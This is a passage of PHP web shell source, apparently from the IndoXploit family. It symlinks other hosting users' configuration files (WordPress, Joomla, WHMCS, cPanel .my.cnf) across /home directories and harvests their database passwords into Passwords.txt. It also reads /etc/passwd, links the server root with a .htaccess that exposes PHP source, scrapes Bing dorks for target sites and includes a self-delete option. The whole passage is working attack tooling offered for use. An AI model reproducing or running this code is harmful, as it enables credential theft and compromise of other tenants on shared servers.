  2593. @symlink('/home9/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2594. @symlink('/home9/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2595. @symlink('/home9/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2596. @symlink('/home9/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2597. @symlink('/home9/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2598. @symlink('/home9/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2599. @symlink('/home9/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2600. @symlink('/home9/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2601. @symlink('/home9/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2602. @symlink('/home9/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2603.  
  2604. //home 10
  2605.  
  2606. @symlink('/home10/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2607. @symlink('/home10/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2608. @symlink('/home10/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2609. @symlink('/home10/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2610. @symlink('/home10/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2611. @symlink('/home10/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2612. @symlink('/home10/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2613. @symlink('/home10/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2614. @symlink('/home10/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2615. @symlink('/home10/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2616. @symlink('/home10/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2617. @symlink('/home10/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2618. @symlink('/home10/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2619. @symlink('/home10/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2620. @symlink('/home10/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2621. @symlink('/home10/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2622. @symlink('/home10/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2623. @symlink('/home10/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2624. @symlink('/home10/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2625. @symlink('/home10/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2626. @symlink('/home10/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2627. @symlink('/home10/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2628. @symlink('/home10/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2629. @symlink('/home10/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2630. @symlink('/home10/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2631. @symlink('/home10/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2632. @symlink('/home10/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2633. @symlink('/home10/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2634. @symlink('/home10/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2635. @symlink('/home10/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2636. @symlink('/home10/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2637. @symlink('/home10/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2638. @symlink('/home10/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2639. @symlink('/home10/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2640. @symlink('/home10/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2641. @symlink('/home10/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2642. @symlink('/home10/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2643. @symlink('/home10/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2644. @symlink('/home10/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2645. @symlink('/home10/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2646. @symlink('/home10/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2647. @symlink('/home10/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2648. @symlink('/home10/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2649. @symlink('/home10/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2650. @symlink('/home10/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2651. @symlink('/home10/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2652. @symlink('/home10/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2653. @symlink('/home10/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2654. @symlink('/home10/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2655. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2656. @symlink('/home10/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2657. @symlink('/home10/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2658. @symlink('/home10/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2659. @symlink('/home10/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2660. @symlink('/home10/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2661. @symlink('/home10/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2662. @symlink('/home10/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2663. @symlink('/home10/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2664. @symlink('/home10/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2665. @symlink('/home10/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2666. @symlink('/home10/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2667. @symlink('/home10/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2668. @symlink('/home10/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2669. @symlink('/home10/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2670. @symlink('/home10/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2671. @symlink('/home10/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2672. @symlink('/home10/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2673. @symlink('/home10/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2674. @symlink('/home10/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2675. @symlink('/home10/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2676. @symlink('/home10/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2677. @symlink('/home10/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2678. @symlink('/home10/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2679. @symlink('/home10/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2680. @symlink('/home10/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2681. @symlink('/home10/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2682. @symlink('/home10/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2683. @symlink('/home10/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2684. @symlink('/home10/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2685. @symlink('/home10/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2686. @symlink('/home10/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2687. @symlink('/home10/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2688. @symlink('/home10/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2689. @symlink('/home10/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2690. @symlink('/home10/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2691. @symlink('/home10/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2692. @symlink('/home10/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2693. @symlink('/home10/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2694. @symlink('/home10/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2695. @symlink('/home10/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2696. @symlink('/home10/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2697. @symlink('/home10/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2698. @symlink('/home10/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2699. @symlink('/home10/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2700. @symlink('/home10/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2701. @symlink('/home10/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2702. @symlink('/home10/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2703. @symlink('/home10/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2704. @symlink('/home10/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2705. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2706. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2707. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2708. @symlink('/home10/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2709. @symlink('/home10/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2710. @symlink('/home10/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2711. @symlink('/home10/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2712. @symlink('/home10/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2713. @symlink('/home10/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2714. @symlink('/home10/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2715. @symlink('/home10/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2716. @symlink('/home10/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2717. @symlink('/home10/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2718. @symlink('/home10/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2719. @symlink('/home10/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2720. @symlink('/home10/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2721. @symlink('/home10/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2722. @symlink('/home10/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2723. @symlink('/home10/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2724. @symlink('/home10/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2725. @symlink('/home10/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2726. @symlink('/home10/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2727. @symlink('/home10/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2728. @symlink('/home10/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2729. @symlink('/home10/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2730. @symlink('/home10/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2731. @symlink('/home10/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2732. @symlink('/home10/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2733. @symlink('/home10/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2734. @symlink('/home10/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2735. @symlink('/home10/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2736. @symlink('/home10/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2737. @symlink('/home10/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2738. @symlink('/home10/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2739. @symlink('/home10/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home10/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home10/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home10/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home10/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home10/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2745. @symlink('/home10/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2746. @symlink('/home10/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2747. @symlink('/home10/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2748. @symlink('/home10/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2749. @symlink('/home10/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2750. @symlink('/home10/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2751. @symlink('/home10/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2752. @symlink('/home10/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2753. @symlink('/home10/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2754. @symlink('/home10/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2755. @symlink('/home10/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2756. @symlink('/home10/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2757. @symlink('/home10/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2758. @symlink('/home10/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2759. @symlink('/home10/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2760. @symlink('/home10/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2761. @symlink('/home10/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2762. @symlink('/home10/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2763. @symlink('/home10/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2764. @symlink('/home10/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2765. @symlink('/home10/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2766. @symlink('/home10/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2767. @symlink('/home10/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2768. @symlink('/home10/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2769. @symlink('/home10/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2770. @symlink('/home10/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2771. @symlink('/home10/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2772. @symlink('/home10/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2773. @symlink('/home10/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2774. @symlink('/home10/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2775. @symlink('/home10/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2776. @symlink('/home10/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2777. @symlink('/home10/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2778. @symlink('/home10/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2779. @symlink('/home10/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2780. @symlink('/home10/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2781. @symlink('/home10/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2782. @symlink('/home10/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2783. @symlink('/home10/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2784. @symlink('/home10/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2785. @symlink('/home10/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2786. @symlink('/home10/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2787. @symlink('/home10/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2788. }
  2789.  
  2790. //password grab
  2791.  
  2792. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2793. {
  2794.  
  2795. $ar0=explode($marqueurDebutLien, $text);
  2796. $ar1=explode($marqueurFinLien, $ar0[1]);
  2797. $ar=trim($ar1[0]);
  2798. return $ar;
  2799. }
  2800.  
  2801. $ffile=fopen('Passwords.txt','a+');
  2802.  
  2803.  
  2804. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/c7e_symconf/";
  2805. $re=$r;
  2806. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2807.  
  2808. $users=file("/etc/passwd");
  2809. foreach($users as $user)
  2810. {
  2811.  
  2812. $str=explode(":",$user);
  2813. $usersss=$str[0];
  2814. foreach($confi as $co)
  2815. {
  2816.  
  2817.  
  2818. $uurl=$re.$usersss.$co;
  2819. $uel=$uurl;
  2820.  
  2821. $ch = curl_init();
  2822.  
  2823. curl_setopt($ch, CURLOPT_URL, $uel);
  2824. curl_setopt($ch, CURLOPT_HEADER, 1);
  2825. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2826. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2827. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2828. $result['EXE'] = curl_exec($ch);
  2829. curl_close($ch);
  2830. $uxl=$result['EXE'];
  2831.  
  2832.  
  2833. if($uxl && preg_match('/table_prefix/i',$uxl))
  2834. {
  2835.  
  2836. //Wordpress
  2837.  
  2838. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2839. if(!empty($dbp))
  2840. $pass=$dbp."\n";
  2841. fwrite($ffile,$pass);
  2842.  
  2843. }
  2844. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2845. {
  2846.  
  2847. //WHMCS
  2848.  
  2849. $dbp=entre2v2($uxl,"db_password = '","';");
  2850. if(!empty($dbp))
  2851. $pass=$dbp."\n";
  2852. fwrite($ffile,$pass);
  2853.  
  2854. }
  2855.  
  2856.  
  2857. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2858. {
  2859.  
  2860. //Joomla
  2861.  
  2862. $db=entre2v2($uxl,"password = '","';");
  2863. if(!empty($db))
  2864. $pass=$db."\n";
  2865. fwrite($ffile,$pass);
  2866. }
  2867. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2868. {
  2869.  
  2870. //Vbulletin
  2871.  
  2872. $db=entre2v2($uxl,"password'] = '","';");
  2873. if(!empty($db))
  2874. $pass=$db."\n";
  2875. fwrite($ffile,$pass);
  2876.  
  2877. }
  2878. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2879. {
  2880.  
  2881. //Other
  2882.  
  2883. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2884. if(!empty($db))
  2885. $pass=$db."\n";
  2886. fwrite($ffile,$pass);
  2887. }
  2888. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2889. {
  2890.  
  2891. //Other
  2892.  
  2893. $db=entre2v2($uxl,"dbpass = '","';");
  2894. if(!empty($db))
  2895. $pass=$db."\n";
  2896. fwrite($ffile,$pass);
  2897. }
  2898. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2899. {
  2900.  
  2901. //Other
  2902.  
  2903. $db=entre2v2($uxl,"dbpass = '","';");
  2904. if(!empty($db))
  2905. $pass=$db."\n";
  2906. fwrite($ffile,$pass);
  2907.  
  2908. }
  2909. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2910. {
  2911.  
  2912. //Other
  2913.  
  2914. $db=entre2v2($uxl,"dbpass = \"","\";");
  2915. if(!empty($db))
  2916. $pass=$db."\n";
  2917. fwrite($ffile,$pass);
  2918. }
  2919.  
  2920.  
  2921. }
  2922. }
  2923. echo "<center>
  2924. <a href=\"c7e_symconf/root/\">Root Server</a>
  2925. <br><a href=\"c7e_symconf/Passwords.txt\">Passwords</a>
  2926. <br><a href=\"c7e_symconf/\">Configurations</a></center>";
  2927. }
  2928. else
  2929. {
  2930. echo "<center>
  2931. <form method=\"POST\">
  2932. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2933. $file = '/etc/passwd';
  2934. $read = @fopen($file, 'r');
  2935. if ($read){
  2936. $body = @fread($read, @filesize($file));
  2937. echo "".htmlentities($body)."";
  2938. }
  2939. elseif(!$read)
  2940. {
  2941. $read = @show_source($file) ;
  2942. }
  2943. elseif(!$read)
  2944. {
  2945. $read = @highlight_file($file);
  2946. }
  2947. elseif(!$read)
  2948. {
  2949. for($uid=0;$uid<1000;$uid++)
  2950. {
  2951. $ara = posix_getpwuid($uid);
  2952. if (!empty($ara))
  2953. {
  2954. while (list ($key, $val) = each($ara))
  2955. {
  2956. print "$val:";
  2957. }
  2958. print "\n";
  2959. }}}
  2960.  
  2961. flush();
  2962.  
  2963. echo "</textarea>
  2964. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2965. </form></center>";
  2966. }
  2967. }
  2968. } elseif(isset($_GET['con7ext']) && ($_GET['con7ext'] == 'bing'))
  2969. {   @ini_set('output_buffering',0);
  2970. ?>
  2971. <head>
  2972. <style type="text/css">
  2973. textarea {
  2974.     width: 500px;
  2975.     height: 250px;
  2976.     border: 1px solid #000000;
  2977.     margin: 5px auto;
  2978.     padding: 7px;
  2979. }
  2980. input[type=text] {
  2981.     padding-left: 7px;
  2982.     width: 250px;
  2983.     height: 25px;
  2984.     border: 1px solid #000000;
  2985.     background: blue;
  2986.     margin: 5px auto;
  2987. }
  2988. </style>
  2989. </head>
  2990. <center><form method="post">
  2991. Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  2992. <input type="submit" name="go" value=">>">
  2993. </form>
  2994. <?php
  2995. // coded by Mr. Magnom
  2996. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  2997. // greetz to Mr. Magnom - Sanjungan Jiwa
  2998. function getsource($url, $proxy) {
  2999.     $curl = curl_init($url);
  3000.     curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  3001.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3002.     if($proxy) {
  3003.         $proxy = explode(':', autoprox());
  3004.         curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  3005.         curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  3006.     }
  3007.     $content = curl_exec($curl);
  3008.     curl_close($curl);
  3009.     return $content;
  3010. }
  3011. $dork = htmlspecialchars($_POST['dork']);
  3012. $do = urlencode($dork);
  3013. if(isset($_POST['go'])) {
  3014.     $npage = 1;
  3015.     $npages = 30000;
  3016.     $allLinks = array();
  3017.     $lll = array();
  3018.     while($npage <= $npages) {
  3019.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  3020.         if($x) {
  3021.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  3022.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  3023.             $npage = $npage + 10;
  3024.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  3025.         } else break;
  3026.     }
  3027.     $URLs = array();
  3028.     foreach($allLinks as $url){
  3029.         $exp = explode("/", $url);
  3030.         $URLs[] = $exp[2];
  3031.     }
  3032.     $array = array_filter($URLs);
  3033.     $array = array_unique($array);
  3034.     $sss = count(array_unique($array));
  3035.     echo "ToTaL SiTe : $sss<br>";
  3036.     foreach($array as $domain) {
  3037.         echo "http://$domain/<br>";
  3038.     }
  3039. }
  3040. }elseif($_GET['con7ext'] == 'info') {
  3041. echo '<br><table width="700" align="center">
  3042. <tr><td>
  3043. <center>
  3044. System : '.$sys.'<br>
  3045. IP : '.$ip.'<br>
  3046. Safe Mode : '.$sm.'<br>
  3047. Disabled Functions : '.$ds.'<br>
  3048. Home_root : '.$home_r.'
  3049. </center>
  3050. </td></tr>
  3051. </table>';
  3052. }elseif($_GET['con7ext'] == 'kill') {
  3053. $fileini = $_SERVER['SCRIPT_FILENAME'];
  3054. rmdir('c7e_sym');rmdir('c7e_conf');unlink($fileini);
  3055. echo 'Good By User :)';
  3056. }
  3057. elseif($_GET['con7ext'] == 'symlink') {
  3058. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3059. $d0mains = @file("/etc/named.conf");
  3060. ##httaces
  3061. if($d0mains){
  3062. @mkdir("c7e_sym",0777);
  3063. @chdir("c7e_sym");
  3064. @exe("ln -s / c7e");
  3065. $file3 = 'Options Indexes FollowSymLinks
  3066. DirectoryIndex c7e.htm
  3067. AddType text/plain .php
  3068. AddHandler text/plain .php
  3069. Satisfy Any';
  3070. $fp3 = fopen('.htaccess','w');
  3071. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3072. echo "
  3073. <table align=center border=1 style='width:60%;border-color:#333333;'>
  3074. <tr>
  3075. <td align=center><font size=2>S. No.</font></td>
  3076. <td align=center><font size=2>Domains</font></td>
  3077. <td align=center><font size=2>Users</font></td>
  3078. <td align=center><font size=2>Symlink</font></td>
  3079. </tr>";
  3080. $dcount = 1;
  3081. foreach($d0mains as $d0main){
  3082. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3083. flush();
  3084. if(strlen(trim($domains[1][0])) > 2){
  3085. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3086. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3087. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3088. <td>".$user['name']."</td>
  3089. <td><a href='c7e_sym/c7e/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3090. flush();
  3091. $dcount++;}}}
  3092. echo "</table>";
  3093. }else{
  3094. $TEST=@file('/etc/passwd');
  3095. if ($TEST){
  3096. @mkdir("c7e_sym",0777);
  3097. @chdir("c7e_sym");
  3098. exe("ln -s / c7e");
  3099. $file3 = 'Options Indexes FollowSymLinks
  3100. DirectoryIndex c7e.htm
  3101. AddType text/plain .php
  3102. AddHandler text/plain .php
  3103. Satisfy Any';
  3104.  $fp3 = fopen('.htaccess','w');
  3105.  $fw3 = fwrite($fp3,$file3);
  3106.  @fclose($fp3);
  3107.  echo "
  3108. <table align=center border=1><tr>
  3109. <td align=center><font size=3>S. No.</font></td>
  3110. <td align=center><font size=3>Users</font></td>
  3111. <td align=center><font size=3>Symlink</font></td></tr>";
